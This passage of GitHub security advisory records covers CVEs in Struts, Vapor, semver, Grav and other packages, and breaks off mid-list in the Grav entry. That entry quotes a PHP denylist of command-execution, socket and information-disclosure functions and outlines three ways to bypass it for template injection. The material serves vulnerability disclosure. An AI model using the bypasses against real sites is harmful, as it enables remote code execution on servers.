| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.31'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.2.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34396'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21'}, {'type': 'WEB', 'url': 'https://cwiki.apache.org/confluence/display/WW/S2-064'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/struts'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/releases/tag/STRUTS_2_5_31'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/releases/tag/STRUTS_6_1_2_1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230706-0005/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/3'}] | {'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:16:52Z', 'nvd_published_at': None} |
1.4.0 | GHSA-gcj9-jj38-hwmc | 2023-06-09T19:31:47Z | 2023-06-09T19:31:47Z | null | ['CVE-2021-21328'] | Vapor's Metrics integration could cause a system drain | ### Impact
This is a DoS attack against anyone who Bootstraps a metrics backend for their Vapor app with the following attack vector:
1. send unlimited requests against a vapor instance with different paths. this will create “unlimited” counters and timers, which will eventually drain the system.
2. downstream services might suffer from this attack as well by being spammed with error paths
### Patches
This has been patched in 4.40.1. The `DefaultResponder` will rewrite any undefined route paths for to `vapor_route_undefined` to avoid unlimited counters.
### Workarounds
Don't bootstrap a metrics system or upgrade to 4.40.1
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Vapor](https://github.com/vapor/vapor)
* Ask in [Discord](http://vapor.team) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}] | [{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.40.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.40.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-gcj9-jj38-hwmc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21328'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/commit/e3aa712508db2854ac0ab905696c65fd88fa7e23'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor/'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/releases/tag/4.40.1'}, {'type': 'WEB', 'url': 'https://vapor.codes/'}] | {'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:31:47Z', 'nvd_published_at': '2021-02-26T02:15:00Z'} |
1.4.0 | GHSA-c2qf-rxjj-qqgw | 2023-07-10T22:57:56Z | 2023-06-21T06:30:28Z | null | ['CVE-2022-25883'] | semver vulnerable to Regular Expression Denial of Service | Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}] | [{'package': {'ecosystem': 'npm', 'name': 'semver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.5.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'semver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'semver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25883'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/pull/564'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/pull/585'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/pull/593'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/commit/2f8fd41487acf380194579ecb6f8b1bbfe116be0'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/commit/717534ee353682f3bcf33e60a8af4292626d4441'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/commit/928e56d21150da0413a3333a3148b20e741a920c'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/node-semver'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/blob/main/classes/range.js#L97-L104'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/blob/main/internal/re.js#L138'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-semver/blob/main/internal/re.js#L160'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SEMVER-3247795'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T16:52:56Z', 'nvd_published_at': None} |
1.4.0 | GHSA-c29g-q3h3-mwcf | 2023-06-16T17:47:39Z | 2023-06-07T21:30:18Z | null | ['CVE-2023-33496'] | xxl-rpc deserialization vulnerability | xxl-rpc v1.7.0 was discovered to contain a deserialization vulnerability via the component `com.xxl.rpc.core.remoting.net.impl.netty.codec.NettyDecode#decode`. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-rpc-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33496'}, {'type': 'WEB', 'url': 'https://github.com/edirc-wong/record/blob/main/deserialization_vulnerability_report.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-rpc'}] | {'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:52:46Z', 'nvd_published_at': None} |
1.4.0 | GHSA-vfrj-fv6p-3cpf | 2023-06-06T01:38:11Z | 2023-06-06T01:38:11Z | null | ['CVE-2023-33965'] | Brook's tproxy server is vulnerable to a drive-by command injection. | The `tproxy` server is vulnerable to a drive-by command injection. An attacker may fool a victim into visiting a malicious web page which will trigger requests to the local `tproxy` service leading to remote code execution. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/txthinking/brook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20230606'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/txthinking/brook/security/advisories/GHSA-vfrj-fv6p-3cpf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33965'}, {'type': 'WEB', 'url': 'https://github.com/txthinking/brook/commit/314d7070c37babf6c38a0fe1eada872bb74bf03e'}, {'type': 'PACKAGE', 'url': 'https://github.com/txthinking/brook'}] | {'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:38:11Z', 'nvd_published_at': None} |
1.4.0 | GHSA-373w-rj84-pv6x | 2023-06-29T15:02:16Z | 2023-06-29T15:02:16Z | null | [] | SafeURL-Python's hostname blocklist does not block FQDNs | ### Description
If a hostname was blacklisted, it was possible to bypass the blacklist by requesting the FQDN of the host (e.g. adding `.` to the end).
### Impact
The main purpose of this library is to block requests to internal/private IPs and these cannot be bypassed using this finding. But if a library user had specifically set certain hostnames as blocked, then an attacker would be able to circumvent that block to cause SSRFs to request those hostnames.
### Patches
Fixed by https://github.com/IncludeSecurity/safeurl-python/pull/6
### Credit
https://github.com/Sim4n6
| [] | [{'package': {'ecosystem': 'PyPI', 'name': 'SafeURL-Python'}, 'ecosystem_specific': {'affected_functions': ['safeurl.safeurl.Options.isInList']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/security/advisories/GHSA-373w-rj84-pv6x'}, {'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/pull/6'}, {'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/commit/c4f9677f8790a58eaa1953bac286cca75a5f580e'}, {'type': 'PACKAGE', 'url': 'https://github.com/IncludeSecurity/safeurl-python'}] | {'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-29T15:02:16Z', 'nvd_published_at': None} |
1.4.0 | GHSA-455c-vqrf-mghr | 2023-06-23T21:37:38Z | 2023-06-16T09:30:24Z | null | ['CVE-2023-2783'] | Mattermost Server Missing Authorization vulnerability | Mattermost Apps Framework fails to verify that a secret provided in the incoming webhook request allowing an attacker to modify the contents of the post sent by the Apps.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.1'}]}], 'versions': ['7.10.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.5'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2783'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost-server'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}] | {'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:37:38Z', 'nvd_published_at': None} |
1.4.0 | GHSA-j245-v2mh-5h6f | 2023-06-09T16:53:00Z | 2023-06-03T12:30:15Z | null | ['CVE-2023-3086'] | TeamPass vulnerable to stored Cross-site Scripting | Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3086'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/17be9e8a-abe8-41db-987f-1d5b0686ae20'}] | {'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:06:02Z', 'nvd_published_at': None} |
1.4.0 | GHSA-97wh-6hmj-g8j9 | 2023-06-30T20:34:45Z | 2023-06-28T15:30:23Z | null | ['CVE-2023-3445'] | Spina Cross-site Scripting vulnerability | Cross-site Scripting (XSS) - Stored in GitHub repository spinacms/spina prior to 2.15.1. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'RubyGems', 'name': 'spina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3445'}, {'type': 'WEB', 'url': 'https://github.com/spinacms/spina/commit/9adfe7b4807b3cc10dbb7351a26cc32f5d8c14a3'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spina/CVE-2023-3445.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spinacms/spina'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/18a74a9d-4a2d-4bf8-ae62-56a909427070'}] | {'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:34:45Z', 'nvd_published_at': None} |
1.4.0 | GHSA-74j8-w7f9-pp62 | 2023-06-30T20:25:52Z | 2023-06-30T20:25:52Z | null | ['CVE-2023-33190'] | Improper configuration of RBAC permissions obtaining cluster control permissions | ### Summary
Improper configuration of RBAC permissions resulted in obtaining cluster control permissions, which could control the entire cluster deployed with Sealos, as well as hundreds of pods and other resources within the cluster.
### Details
detail's is disable by publish.
### PoC
detail's is disable by publish.
### Impact
+ sealos public cloud user
+ CWE-287 Improper Authentication
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/labring/sealos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.1-rc4'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/labring/sealos/security/advisories/GHSA-74j8-w7f9-pp62'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33190'}, {'type': 'WEB', 'url': 'https://github.com/labring/sealos/commit/4cdf52e55666864e5f90ed502e9fc13e18985b7b'}, {'type': 'PACKAGE', 'url': 'https://github.com/labring/sealos'}] | {'cwe_ids': ['CWE-287', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:25:52Z', 'nvd_published_at': None} |
1.4.0 | GHSA-j8xg-fqg3-53r7 | 2023-06-27T15:48:19Z | 2023-06-22T06:30:18Z | null | ['CVE-2023-26115'] | word-wrap vulnerable to Regular Expression Denial of Service | All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}] | [{'package': {'ecosystem': 'npm', 'name': 'word-wrap'}, 'ecosystem_specific': {'affected_functions': ['word-wrap']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26115'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/commit/420dce9a2412b21881202b73a3c34f0edc53cb2e'}, {'type': 'PACKAGE', 'url': 'https://github.com/jonschlinkert/word-wrap'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/blob/master/index.js#L39'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/blob/master/index.js%23L39'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/word-wrap/releases/tag/1.2.4'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-4058657'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-WORDWRAP-3149973'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:36:40Z', 'nvd_published_at': None} |
1.4.0 | GHSA-xcf7-rvmh-g6q4 | 2023-06-21T22:07:52Z | 2023-06-21T22:07:52Z | null | [] | `openssl` `X509VerifyParamRef::set_host` buffer over-read | When this function was passed an empty string, `openssl` would attempt to call `strlen` on it, reading arbitrary memory until it reached a NUL byte.
| [] | [{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.55'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/issues/1965'}, {'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1968'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0044.html'}] | {'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:07:52Z', 'nvd_published_at': None} |
1.4.0 | GHSA-9q9m-c65c-37pq | 2023-08-28T17:16:39Z | 2023-06-05T18:30:27Z | null | ['CVE-2023-33733'] | Reportlab vulnerable to remote code execution | Reportlab up to and including v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'reportlab'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.6.12'}}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33733'}, {'type': 'WEB', 'url': 'https://github.com/c53elyas/CVE-2023-33733'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36WOY22ECJCPOXHVTNCHEWOQLL7JSWP4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ALE727IRACYBTTOFIFG57RS4OA2SHIJ/'}] | {'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-28T17:16:39Z', 'nvd_published_at': None} |
1.4.0 | GHSA-853p-5678-hv8f | 2023-06-16T17:57:43Z | 2023-06-14T20:11:38Z | null | ['CVE-2023-34449'] | ink! vulnerable to incorrect decoding of storage value when using `DelegateCall` | ### Summary
The return value when using delegate call mechanics, either through [`CallBuilder::delegate`](https://docs.rs/ink_env/4.2.0/ink_env/call/struct.CallBuilder.html#method.delegate) or [`ink_env::invoke_contract_delegate`](https://docs.rs/ink_env/4.2.0/ink_env/fn.invoke_contract_delegate.html), is being decoded incorrectly.
### Description
Consider this minimal example:
```rust
// First contract, this will be performing a delegate call to the `Callee`.
#[ink(storage)]
pub struct Caller {
value: u128,
}
#[ink(message)]
pub fn get_value(&self, callee_code_hash: Hash) -> u128 {
let result = build_call::<DefaultEnvironment>()
.delegate(callee_code_hash)
.exec_input(ExecutionInput::new(Selector::new(ink::selector_bytes!(
"get_value"
))))
.returns::<u128>()
.invoke();
result
}
// Different contract, using this code hash for the delegate call.
#[ink(storage)]
pub struct Callee {
value: u128,
}
#[ink(message)]
pub fn get_value(&self) -> u128 {
self.value
}
```
In this example we are executing the `Callee` code in the context of the `Caller` contract. This means we'll be using the storage values of the `Caller` contract.
Running this code we expect the delegate call to return `value` as it was stored in the `Caller` contract. However, due to the reported bug a different value is returned (for the case of `uint`s it is `256` times the expected value).
### Impact
After conducting an analysis of the on-chain deployments of ink! contracts on Astar, Shiden, Aleph Zero, Amplitude and Pendulum, we have found that no contracts on those chains have been affected by the issue.
This bug was related to the mechanics around decoding a call's return buffer, which was changed as part of https://github.com/paritytech/ink/pull/1450. Since this feature was only released in ink! 4.0.0 no previous versions are affected.
### Mitigations
If you have an ink! 4.x series contract, please update it to the [4.2.1](https://github.com/paritytech/ink/releases/tag/v4.2.1) patch release that we just published.
### Credits
Thank you Facundo Lerena from [CoinFabrik](https://www.coinfabrik.com) for reporting this problem in a well-structured and responsible way. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}] | [{'package': {'ecosystem': 'crates.io', 'name': 'ink'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'ink_env'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/paritytech/ink/security/advisories/GHSA-853p-5678-hv8f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34449'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/ink/pull/1450'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/ink/commit/f1407ee9f87e5f64d467a22d26ee88f61db7f3db'}, {'type': 'WEB', 'url': 'https://docs.rs/ink_env/4.2.0/ink_env/call/struct.CallBuilder.html#method.delegate'}, {'type': 'WEB', 'url': 'https://docs.rs/ink_env/4.2.0/ink_env/fn.invoke_contract_delegate.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/ink'}] | {'cwe_ids': ['CWE-253', 'CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:11:38Z', 'nvd_published_at': None} |
1.4.0 | GHSA-98px-6486-j7qc | 2023-06-07T13:50:21Z | 2023-06-06T16:41:34Z | null | ['CVE-2023-32683'] | Synapse has URL deny list bypass via oEmbed and image URLs when generating previews | ### Impact
A discovered oEmbed or image URL can bypass the `url_preview_url_blacklist` setting potentially allowing server side request forgery or bypassing network policies. Impact is limited to IP addresses allowed by the `url_preview_ip_range_blacklist` setting (by default this only allows public IPs) and by the limited information returned to the client:
* For discovered oEmbed URLs, any non-JSON response or a JSON response which includes non-oEmbed information is discarded.
* For discovered image URLs, any non-image response is discarded.
Systems which have URL preview disabled (via the `url_preview_enabled` setting) or have not configured a `url_preview_url_blacklist` are not affected.
Because of the uncommon configuration required, the limited information a malicious user, and the amount of guesses/time the attack would need; the severity is rated as low.
### Patches
The issue is fixed by #15601.
### Workarounds
The default configuration of the `url_preview_ip_range_blacklist` should protect against requests being made to internal infrastructure, URL previews of public URLs is expected.
Alternately URL previews could be disabled using the `url_preview_enabled` setting. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.85.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-98px-6486-j7qc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32683'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/15601'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.85.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-synapse/PYSEC-2023-85.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6DH5A5YEB5LRIPP32OUW25FCGZFCZU2/'}] | {'cwe_ids': ['CWE-863', 'CWE-918'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:41:34Z', 'nvd_published_at': None} |
1.4.0 | GHSA-j3v8-v77f-fvgm | 2023-06-16T19:36:52Z | 2023-06-16T19:36:52Z | null | ['CVE-2023-34253'] | Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability | Hi,
actually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023.
# Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability
## Summary:
| **Product** | Grav CMS |
| ----------------------- | --------------------------------------------- |
| **Vendor** | Grav |
| **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |
| **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |
| **Tested Versions** | v1.7.40 |
| **Internal Identifier** | STAR-2023-0006 |
| **CVE Identifier** | Reserved CVE-2023-30592, CVE-2023-30593, CVE-2023-30594 |
| **CWE(s)** | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |
## CVSS3.1 Scoring System:
**Base Score:** 7.2 (High)
**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`
| **Metric** | **Value** |
| ---------------------------- | --------- |
| **Attack Vector (AV)** | Network |
| **Attack Complexity (AC)** | Low |
| **Privileges Required (PR)** | High |
| **User Interaction (UI)** | None |
| **Scope (S)** | Unchanged |
| **Confidentiality \(C)** | High |
| **Integrity (I)** | High |
| **Availability (A)** | High |
## Product Overview:
Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.
## Vulnerability Summary:
The denylist introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.
## Vulnerability Details:
In addressing [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a denylist was introduced in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) to validate and ensure that dangerous functions could not be executed via injection of malicious templates.
The implementation of the denylist can be found in `Utils::isDangerousFunction()` within [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190):
~~~php
/**
* @param string $name
* @return bool
*/
public static function isDangerousFunction(string $name): bool
{
static $commandExecutionFunctions = [
'exec',
'passthru',
'system',
'shell_exec',
'popen',
'proc_open',
'pcntl_exec',
];
static $codeExecutionFunctions = [
'assert',
'preg_replace',
'create_function',
'include',
'include_once',
'require',
'require_once'
];
static $callbackFunctions = [
'ob_start' => 0,
'array_diff_uassoc' => -1,
'array_diff_ukey' => -1,
'array_filter' => 1,
'array_intersect_uassoc' => -1,
'array_intersect_ukey' => -1,
'array_map' => 0,
'array_reduce' => 1,
'array_udiff_assoc' => -1,
'array_udiff_uassoc' => [-1, -2],
'array_udiff' => -1,
'array_uintersect_assoc' => -1,
'array_uintersect_uassoc' => [-1, -2],
'array_uintersect' => -1,
'array_walk_recursive' => 1,
'array_walk' => 1,
'assert_options' => 1,
'uasort' => 1,
'uksort' => 1,
'usort' => 1,
'preg_replace_callback' => 1,
'spl_autoload_register' => 0,
'iterator_apply' => 1,
'call_user_func' => 0,
'call_user_func_array' => 0,
'register_shutdown_function' => 0,
'register_tick_function' => 0,
'set_error_handler' => 0,
'set_exception_handler' => 0,
'session_set_save_handler' => [0, 1, 2, 3, 4, 5],
'sqlite_create_aggregate' => [2, 3],
'sqlite_create_function' => 2,
];
static $informationDiscosureFunctions = [
'phpinfo',
'posix_mkfifo',
'posix_getlogin',
'posix_ttyname',
'getenv',
'get_current_user',
'proc_get_status',
'get_cfg_var',
'disk_free_space',
'disk_total_space',
'diskfreespace',
'getcwd',
'getlastmo',
'getmygid',
'getmyinode',
'getmypid',
'getmyuid'
];
static $otherFunctions = [
'extract',
'parse_str',
'putenv',
'ini_set',
'mail',
'header',
'proc_nice',
'proc_terminate',
'proc_close',
'pfsockopen',
'fsockopen',
'apache_child_terminate',
'posix_kill',
'posix_mkfifo',
'posix_setpgid',
'posix_setsid',
'posix_setuid',
];
if (in_array($name, $commandExecutionFunctions)) {
return true;
}
if (in_array($name, $codeExecutionFunctions)) {
return true;
}
if (isset($callbackFunctions[$name])) {
return true;
}
if (in_array($name, $informationDiscosureFunctions)) {
return true;
}
if (in_array($name, $otherFunctions)) {
return true;
}
return static::isFilesystemFunction($name);
}
/**
* @param string $name
* @return bool
*/
public static function isFilesystemFunction(string $name): bool
{
static $fileWriteFunctions = [
'fopen',
'tmpfile',
'bzopen',
'gzopen',
// write to filesystem (partially in combination with reading)
'chgrp',
'chmod',
'chown',
'copy',
'file_put_contents',
'lchgrp',
'lchown',
